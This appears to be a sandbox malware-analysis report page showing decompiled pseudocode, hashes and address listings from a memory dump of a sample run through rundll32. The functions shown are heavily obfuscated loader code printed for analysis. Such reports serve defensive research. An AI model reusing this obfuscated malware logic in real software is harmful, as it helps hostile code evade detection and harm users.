                                                                                                                                    0x002d8d64
                                                                                                                                    0x002d8d6b
                                                                                                                                    0x002d8d78
                                                                                                                                    0x002d8d7b
                                                                                                                                    0x002d8d7e
                                                                                                                                    0x002d8d85
                                                                                                                                    0x002d8d93
                                                                                                                                    0x002d8d96
                                                                                                                                    0x002d8d9d
                                                                                                                                    0x002d8da4
                                                                                                                                    0x002d8dae
                                                                                                                                    0x002d8db1
                                                                                                                                    0x002d8db4
                                                                                                                                    0x002d8dbb
                                                                                                                                    0x002d8dc2
                                                                                                                                    0x002d8dc9
                                                                                                                                    0x002d8dd0
                                                                                                                                    0x002d8dd7
                                                                                                                                    0x002d8dde
                                                                                                                                    0x002d8de5
                                                                                                                                    0x002d8dec
                                                                                                                                    0x002d8df7
                                                                                                                                    0x002d8dfa
                                                                                                                                    0x002d8e01
                                                                                                                                    0x002d8e08
                                                                                                                                    0x002d8e0f
                                                                                                                                    0x002d8e16
                                                                                                                                    0x002d8e1a
                                                                                                                                    0x002d8e1e
                                                                                                                                    0x002d8e25
                                                                                                                                    0x002d8e25
                                                                                                                                    0x002d8e33
                                                                                                                                    0x002d8ef3
                                                                                                                                    0x002d8efc
                                                                                                                                    0x002d8efd
                                                                                                                                    0x002d8eff
                                                                                                                                    0x002d8f01
                                                                                                                                    0x002d8f0b
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8f0b
                                                                                                                                    0x002d8e3f
                                                                                                                                    0x002d8e8c
                                                                                                                                    0x002d8e91
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8e91
                                                                                                                                    0x002d8e47
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8e57
                                                                                                                                    0x002d8e5c
                                                                                                                                    0x002d8e62
                                                                                                                                    0x002d8e67
                                                                                                                                    0x002d8e68
                                                                                                                                    0x002d8e69
                                                                                                                                    0x002d8e6b
                                                                                                                                    0x002d8e70
                                                                                                                                    0x002d8e73
                                                                                                                                    0x002d8e76
                                                                                                                                    0x002d8e7d
                                                                                                                                    0x002d8e7e
                                                                                                                                    0x002d8e81
                                                                                                                                    0x002d8e81
                                                                                                                                    0x002d8ea2
                                                                                                                                    0x002d8ea7
                                                                                                                                    0x002d8ead
                                                                                                                                    0x002d8eb2
                                                                                                                                    0x002d8eb3
                                                                                                                                    0x002d8eb5
                                                                                                                                    0x002d8eb7
                                                                                                                                    0x002d8ebc
                                                                                                                                    0x002d8ec2
                                                                                                                                    0x002d8ec8
                                                                                                                                    0x002d8ec9
                                                                                                                                    0x002d8eca
                                                                                                                                    0x002d8ecc
                                                                                                                                    0x002d8ed1
                                                                                                                                    0x002d8ed4
                                                                                                                                    0x002d8ed7
                                                                                                                                    0x002d8ede
                                                                                                                                    0x002d8edf
                                                                                                                                    0x002d8ee2
                                                                                                                                    0x002d8ee5
                                                                                                                                    0x002d8ee5
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ulG$wV
                                                                                                                                    • API String ID: 0-391097709
                                                                                                                                    • Opcode ID: 85b284142a1b95f508570ec6730705ac00aba33c5a5536c2d82744c6a9960b87
                                                                                                                                    • Instruction ID: d71d99f4af2b12f401754c5fc3141005ae0c813adceb5e044a56b4bc908dd35a
                                                                                                                                    • Opcode Fuzzy Hash: 85b284142a1b95f508570ec6730705ac00aba33c5a5536c2d82744c6a9960b87
                                                                                                                                    • Instruction Fuzzy Hash: 28915672D01219EBDB14DFE5D88AADEBBB1FF44314F20814AE216B6250D7B01A45CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C6D24 Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002C6D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E002C9DCF(_v532, _v584, _v580,  &_v524,  &_v524, E002C4EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E002DDCF7(_v556, 0x2c1000, __eflags);
							_t173 =  *0x2e3e10; // 0x0
							_t188 =  *0x2e3e10; // 0x0
							E002C47CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E002CA8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E002CB6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}































                                                                                                                                    0x002c6d2a
                                                                                                                                    0x002c6d34
                                                                                                                                    0x002c6d3c
                                                                                                                                    0x002c6d41
                                                                                                                                    0x002c6d49
                                                                                                                                    0x002c6d51
                                                                                                                                    0x002c6d56
                                                                                                                                    0x002c6d5b
                                                                                                                                    0x002c6d63
                                                                                                                                    0x002c6d75
                                                                                                                                    0x002c6d7a
                                                                                                                                    0x002c6d80
                                                                                                                                    0x002c6d88
                                                                                                                                    0x002c6d90
                                                                                                                                    0x002c6d98
                                                                                                                                    0x002c6da0
                                                                                                                                    0x002c6da8
                                                                                                                                    0x002c6db0
                                                                                                                                    0x002c6db5
                                                                                                                                    0x002c6dbd
                                                                                                                                    0x002c6dc5
                                                                                                                                    0x002c6dd2
                                                                                                                                    0x002c6dd5
                                                                                                                                    0x002c6dd9
                                                                                                                                    0x002c6de1
                                                                                                                                    0x002c6de9
                                                                                                                                    0x002c6df1
                                                                                                                                    0x002c6dfb
                                                                                                                                    0x002c6dff
                                                                                                                                    0x002c6e07
                                                                                                                                    0x002c6e0f
                                                                                                                                    0x002c6e17
                                                                                                                                    0x002c6e1f
                                                                                                                                    0x002c6e27
                                                                                                                                    0x002c6e2f
                                                                                                                                    0x002c6e37
                                                                                                                                    0x002c6e3f
                                                                                                                                    0x002c6e47
                                                                                                                                    0x002c6e4f
                                                                                                                                    0x002c6e54
                                                                                                                                    0x002c6e5c
                                                                                                                                    0x002c6e64
                                                                                                                                    0x002c6e6c
                                                                                                                                    0x002c6e74
                                                                                                                                    0x002c6e7c
                                                                                                                                    0x002c6e84
                                                                                                                                    0x002c6e94
                                                                                                                                    0x002c6e98
                                                                                                                                    0x002c6ea0
                                                                                                                                    0x002c6ea8
                                                                                                                                    0x002c6eb0
                                                                                                                                    0x002c6eb8
                                                                                                                                    0x002c6ec4
                                                                                                                                    0x002c6ec7
                                                                                                                                    0x002c6ecb
                                                                                                                                    0x002c6ed3
                                                                                                                                    0x002c6edb
                                                                                                                                    0x002c6ee0
                                                                                                                                    0x002c6ee8
                                                                                                                                    0x002c6ef0
                                                                                                                                    0x002c6efa
                                                                                                                                    0x002c6f08
                                                                                                                                    0x002c6f15
                                                                                                                                    0x002c6f1e
                                                                                                                                    0x002c6f23
                                                                                                                                    0x002c6f2b
                                                                                                                                    0x002c6f38
                                                                                                                                    0x002c6f3c
                                                                                                                                    0x002c6f44
                                                                                                                                    0x002c6f44
                                                                                                                                    0x002c6f4e
                                                                                                                                    0x00000000
                                                                                                                                    0x002c701e
                                                                                                                                    0x002c6f56
                                                                                                                                    0x002c6f68
                                                                                                                                    0x002c6f71
                                                                                                                                    0x002c6f79
                                                                                                                                    0x002c6f8a
                                                                                                                                    0x002c6fa2
                                                                                                                                    0x002c6fb2
                                                                                                                                    0x002c6fc1
                                                                                                                                    0x002c6fc6
                                                                                                                                    0x002c6fc9
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6fc9
                                                                                                                                    0x002c6f5e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6f64
                                                                                                                                    0x002c6f64
                                                                                                                                    0x002c6fe0
                                                                                                                                    0x002c6fe7
                                                                                                                                    0x002c6fe9
                                                                                                                                    0x002c6fec
                                                                                                                                    0x002c6fee
                                                                                                                                    0x002c6fee
                                                                                                                                    0x002c6fee
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Gx\$e2
                                                                                                                                    • API String ID: 0-3912940318
                                                                                                                                    • Opcode ID: c798d3a62a33a197fb75ec36bdb3a0abba1fe6da41d56cecb7ce44d85fd48c6a
                                                                                                                                    • Instruction ID: 437e0ff6c7738cfe045fbe350b7b1067777a09cee69cb916f78c0f1097a1de47
                                                                                                                                    • Opcode Fuzzy Hash: c798d3a62a33a197fb75ec36bdb3a0abba1fe6da41d56cecb7ce44d85fd48c6a
                                                                                                                                    • Instruction Fuzzy Hash: 9C7152711183419FC768CF21D88A91FBBF1FBC4748F205A1DF29696260D3B18959CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CA55F Relevance: 2.7, Strings: 2, Instructions: 159COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002CA55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E002DDA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x2e3e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E002C3BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E002CCB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}































                                                                                                                                    0x002ca55f
                                                                                                                                    0x002ca565
                                                                                                                                    0x002ca56c
                                                                                                                                    0x002ca571
                                                                                                                                    0x002ca576
                                                                                                                                    0x002ca57e
                                                                                                                                    0x002ca590
                                                                                                                                    0x002ca595
                                                                                                                                    0x002ca5a0
                                                                                                                                    0x002ca5a3
                                                                                                                                    0x002ca5a7
                                                                                                                                    0x002ca5af
                                                                                                                                    0x002ca5b7
                                                                                                                                    0x002ca5bb
                                                                                                                                    0x002ca5c0
                                                                                                                                    0x002ca5c8
                                                                                                                                    0x002ca5d0
                                                                                                                                    0x002ca5d8
                                                                                                                                    0x002ca5dd
                                                                                                                                    0x002ca5e5
                                                                                                                                    0x002ca5ed
                                                                                                                                    0x002ca5f5
                                                                                                                                    0x002ca5fd
                                                                                                                                    0x002ca605
                                                                                                                                    0x002ca612
                                                                                                                                    0x002ca616
                                                                                                                                    0x002ca61e
                                                                                                                                    0x002ca626
                                                                                                                                    0x002ca62e
                                                                                                                                    0x002ca63e
                                                                                                                                    0x002ca642
                                                                                                                                    0x002ca64a
                                                                                                                                    0x002ca652
                                                                                                                                    0x002ca65a
                                                                                                                                    0x002ca662
                                                                                                                                    0x002ca66a
                                                                                                                                    0x002ca672
                                                                                                                                    0x002ca67a
                                                                                                                                    0x002ca682
                                                                                                                                    0x002ca68a
                                                                                                                                    0x002ca692
                                                                                                                                    0x002ca69a
                                                                                                                                    0x002ca69f
                                                                                                                                    0x002ca6a7
                                                                                                                                    0x002ca6af
                                                                                                                                    0x002ca6b7
                                                                                                                                    0x002ca6c0
                                                                                                                                    0x002ca6c5
                                                                                                                                    0x002ca6c9
                                                                                                                                    0x002ca6d1
                                                                                                                                    0x002ca6df
                                                                                                                                    0x002ca6e4
                                                                                                                                    0x002ca6e8
                                                                                                                                    0x002ca6f0
                                                                                                                                    0x002ca6f8
                                                                                                                                    0x002ca706
                                                                                                                                    0x002ca70a
                                                                                                                                    0x002ca71a
                                                                                                                                    0x002ca726
                                                                                                                                    0x002ca72f
                                                                                                                                    0x002ca73c
                                                                                                                                    0x002ca73c
                                                                                                                                    0x002ca742
                                                                                                                                    0x002ca772
                                                                                                                                    0x002ca777
                                                                                                                                    0x002ca77a
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca77a
                                                                                                                                    0x002ca746
                                                                                                                                    0x002ca7f0
                                                                                                                                    0x002ca7f5
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca80f
                                                                                                                                    0x002ca752
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca758
                                                                                                                                    0x002ca758
                                                                                                                                    0x002ca77e
                                                                                                                                    0x002ca78f
                                                                                                                                    0x002ca793
                                                                                                                                    0x002ca79b
                                                                                                                                    0x002ca7b3
                                                                                                                                    0x002ca7bc
                                                                                                                                    0x002ca7bf
                                                                                                                                    0x002ca7d3
                                                                                                                                    0x002ca7d3
                                                                                                                                    0x002ca7d7
                                                                                                                                    0x002ca7d9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca7c4
                                                                                                                                    0x002ca7c8
                                                                                                                                    0x002ca7d0
                                                                                                                                    0x002ca7d0
                                                                                                                                    0x002ca7d0
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca7d0
                                                                                                                                    0x002ca7ca
                                                                                                                                    0x002ca7ca
                                                                                                                                    0x002ca7ca
                                                                                                                                    0x002ca7ce
                                                                                                                                    0x002ca7dd
                                                                                                                                    0x002ca7e0
                                                                                                                                    0x002ca7e0
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca7e0
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca7ce
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca7e2
                                                                                                                                    0x002ca7e2
                                                                                                                                    0x002ca7e2
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: QNiA$sz
                                                                                                                                    • API String ID: 0-294658094
                                                                                                                                    • Opcode ID: 163305e1802cdf98d8f67ef249ae1b963b9d3aa36fd10c271da3f91973da46d2
                                                                                                                                    • Instruction ID: 2106e28e3ac421a31bd5a88afa22b5a7ddbf898635213dfa6f69cdd586b85d5e
                                                                                                                                    • Opcode Fuzzy Hash: 163305e1802cdf98d8f67ef249ae1b963b9d3aa36fd10c271da3f91973da46d2
                                                                                                                                    • Instruction Fuzzy Hash: 42716331519341ABC398CF26D98591FFBF1FBC4718F404A1DF58AA6260D3B48A198F83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D0B19 Relevance: 2.6, Strings: 2, Instructions: 144COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002D0B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x2e3208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E002D8519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E002C8DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E002D9E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E002D1E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}
































                                                                                                                                    0x002d0b19
                                                                                                                                    0x002d0b1c
                                                                                                                                    0x002d0b26
                                                                                                                                    0x002d0b32
                                                                                                                                    0x002d0b3a
                                                                                                                                    0x002d0b3e
                                                                                                                                    0x002d0b40
                                                                                                                                    0x002d0b48
                                                                                                                                    0x002d0b4e
                                                                                                                                    0x002d0b56
                                                                                                                                    0x002d0b5e
                                                                                                                                    0x002d0b66
                                                                                                                                    0x002d0b6e
                                                                                                                                    0x002d0b76
                                                                                                                                    0x002d0b7e
                                                                                                                                    0x002d0b86
                                                                                                                                    0x002d0b8e
                                                                                                                                    0x002d0b96
                                                                                                                                    0x002d0b9e
                                                                                                                                    0x002d0ba2
                                                                                                                                    0x002d0baa
                                                                                                                                    0x002d0bb2
                                                                                                                                    0x002d0bba
                                                                                                                                    0x002d0bc2
                                                                                                                                    0x002d0bca
                                                                                                                                    0x002d0bd8
                                                                                                                                    0x002d0bdd
                                                                                                                                    0x002d0be3
                                                                                                                                    0x002d0be8
                                                                                                                                    0x002d0bf0
                                                                                                                                    0x002d0bf8
                                                                                                                                    0x002d0bfd
                                                                                                                                    0x002d0c02
                                                                                                                                    0x002d0c0a
                                                                                                                                    0x002d0c12
                                                                                                                                    0x002d0c1a
                                                                                                                                    0x002d0c22
                                                                                                                                    0x002d0c2a
                                                                                                                                    0x002d0c32
                                                                                                                                    0x002d0c3e
                                                                                                                                    0x002d0c43
                                                                                                                                    0x002d0c4d
                                                                                                                                    0x002d0c52
                                                                                                                                    0x002d0c58
                                                                                                                                    0x002d0c60
                                                                                                                                    0x002d0c68
                                                                                                                                    0x002d0c74
                                                                                                                                    0x002d0c77
                                                                                                                                    0x002d0c7b
                                                                                                                                    0x002d0c83
                                                                                                                                    0x002d0c8b
                                                                                                                                    0x002d0c93
                                                                                                                                    0x002d0c98
                                                                                                                                    0x002d0ca0
                                                                                                                                    0x002d0ca8
                                                                                                                                    0x002d0cb0
                                                                                                                                    0x002d0cbd
                                                                                                                                    0x002d0cc1
                                                                                                                                    0x002d0cc9
                                                                                                                                    0x002d0cd9
                                                                                                                                    0x002d0cdc
                                                                                                                                    0x002d0ce0
                                                                                                                                    0x002d0ce5
                                                                                                                                    0x002d0ced
                                                                                                                                    0x002d0cf5
                                                                                                                                    0x002d0cfd
                                                                                                                                    0x002d0d05
                                                                                                                                    0x002d0d0d
                                                                                                                                    0x002d0d15
                                                                                                                                    0x002d0d1d
                                                                                                                                    0x002d0d22
                                                                                                                                    0x002d0d9d
                                                                                                                                    0x002d0d9d
                                                                                                                                    0x002d0da1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0d2f
